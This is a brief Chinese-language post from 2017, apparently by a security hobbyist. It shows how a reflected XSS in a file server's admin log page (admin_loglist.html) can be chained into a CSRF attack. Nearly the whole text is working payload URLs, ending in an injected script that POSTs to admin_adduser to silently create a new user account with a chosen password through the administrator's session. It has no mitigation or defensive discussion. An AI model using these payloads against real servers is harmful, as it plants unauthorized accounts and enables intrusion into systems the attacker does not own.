使用xss利用csrf漏洞

by Netfairy - 2017-03-13

xss漏洞

http://172.16.160.128:5466/admin_loglist.html?domain=<script>alert(xss)</script>
结合跨站漏洞

http://172.16.160.128:5466/admin_loglist.html?domain=<script>ajaxRequest('目标地址','数据', "post")</script>


http://172.16.160.128:5466/admin_loglist.html?domain=<script>ajaxRequest('admin_adduser','domain=netfairy.net&user={"username":"tadcdacest","password":"addscdamin","oldpassword":"","max_download":"0","max_upload":"0","max_download_account":"0","max_upload_account":"0","max_connection":"0","connect_timeout":"5","idle_timeout":"5","connect_per_ip":"0","pass_length":"0","show_hidden_file":0,"change_pass":0,"send_message":0,"ratio_credit":"0","ratio_download":"1","ratio_upload":"1","ratio_count_method":0,"enable_ratio":0,"current_quota":"0","max_quota":"0","enable_quota":0,"note_name":"","note_address":"","note_zip":"","note_phone":"","note_fax":"","note_email":"","note_memo":"","ipmasks":[],"filemasks":[],"directories":[],"usergroups":[],"subdir_perm":[],"enable_schedule":0,"schedules":[],"limit_reset_type":"0","limit_enable_upload":0,"cur_upload_size":"0","max_upload_size":"0","limit_enable_download":0,"cur_download_size":"0","max_download_size":"0","enable_expire":0,"expiretime":"2017-04-12 10:42:40","protocol_type":63,"enable_password":1,"enable_account":1,"ssh_pubkey_path":"","enable_ssh_pubkey_auth":0,"ssh_auth_method":0}', "post")</script>